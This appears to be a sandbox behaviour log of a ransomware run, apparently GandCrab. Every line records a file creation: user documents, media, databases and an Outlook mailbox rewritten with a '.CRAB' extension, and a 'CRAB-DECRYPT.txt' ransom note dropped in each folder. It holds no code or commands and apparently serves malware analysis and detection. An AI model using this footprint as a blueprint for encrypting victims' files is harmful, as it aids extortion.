Create C:\Users\FD1HVy\AppData\Roaming\P-6J-4erJllWGU.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\q-bzLPjgvN.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\TH-SgXsaCxAtFhs.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\tmXYFRsX11CKD.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\v07Ls34TtI2e2.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\XIyJzuCAZKp7FI8XtdfZ.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\ZCj BRzcwQ34J_4sU.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Zpb7MEqh0 CYJOL.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Contacts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\3YtnfBFuH2syxVeLR.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\58mWnEiPpJO.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\5a0xsIsvo9B Pz5hE.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\6DFLkl3W-.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\C7oIN7zl yMfBY.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\CgT8pG5C0n_2xIEfr_F.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\CokgiJbfo.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\dCKKx1mIUZT.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\jIagDhQZbJ.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\jXrYf3.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\0qL6S4uErTccQAF-Dv.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\hFrFPxb8MV.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\nPxPXby_sXNq.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\z TAdGvNC.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\Z0c7R042i.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\75_MC9kMrPv.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\dhBExWsWg.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\9wMt0MFWi9yy6f_c4.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\d7b9sC4Na0cYWewrK-84.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\eKX86jnwCfyeb.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\fyqw2Kf8C8q6X3cE.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\hn0sCrkZ4N.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\LHNKQwe8rphIR.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\nQ8N8\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\nQ8N8\1YAFu-V.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\nQ8N8\as1G1E6Jqs.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\nQ8N8\jdDr_ w.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\pEGtyK.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\U9s6.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\KtvotL7\_hBA.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\MZtNFJefBk1P2f.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\nat_UUQ7K.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\oSrvpE HbMBs23rh.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\PDRBVKUuD1Ueb7.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\PQwk.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\QgdzGCqfkC.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\qMoyhXrD.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\RJM4k-y4s3a.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\RzoorB.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\sample_file.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\sMAcMsm4ECtN.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\SnZid9RwbE.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\ss9tA-.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\USiAwCYMA9Lkr7o7PP.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\V72JJY7J e3zEt9r.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\VJJVWDcXp7MqmUGGF.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\VVLx2.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\~$mple_file.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\-0fJmL3bi.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\06jV T28Xs4TvJMPi4z.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\0C0XEtqYbFfOyhEsq3.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\1H_111VdHTZJJc3.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\5D0qyNlmFgdRx9dZO.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\6-j2WJobEBBb9GmGfa.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\8j9c-cEZcmln.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\AF0ngRXXmaR.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Ai1M7-pOZVjhtn4dLoMr.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Br59.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\cf19s7.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\CyNfJ6443Hfo.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Database1.accdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Database2.accdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\edbdc6QeQPsH6ASF.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\f4KrkJW2mNQb_4F.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\FbWu0 gkV 0.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Gy2hEHoXoYHLzZf.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\IcLI.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\iRYQhHd6ZnI.pdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\ixdm1 Ue4mi.pdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\JfPKGiVOE9RS.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\JN-S-AtXXa.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\lDDus455bEC.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\LpyxD7Sru0K1.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\mNfJ.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\n3oxqqGeLT2.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\NfOMPr_PuTTmJS.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\nsCarGwc WrmGcvn1C.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\O-nlVfF.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\o3eEsXejz1XDZ7.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\OitZoUEZJ317i.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\oKmD89Dfe8C_pPf6dT.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\ozq HhdBwesGYW.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\PnZNN_8rP.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\QJ-Cwnm.odp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\qjBeiI 42MzZtOoYfc-z.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\RHiKd8RHK7rrt4ctEhH.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\rjydiFRRf8tHAs2.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\SwkI.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\T1hyWjL3VFrTv0vOPr.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\TM2P8tFsH0lBrKBSnx.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\UTShq02xps5QRee.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\VdeHwGMyNPfIDVNvpfY.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\vDjzW4lIYP9.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\vdW-b6mHnh31jiB.odt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\XrPH.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\YHy B3coZWLQC.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\zbfP5nB_GJFxpU2x2K3.pps.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\zfS_qYUqV v-scd.csv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\ZyiDYB4GuSyGpvVwOoYs.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\_VTdzbn25.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\Bing.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Favorites\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
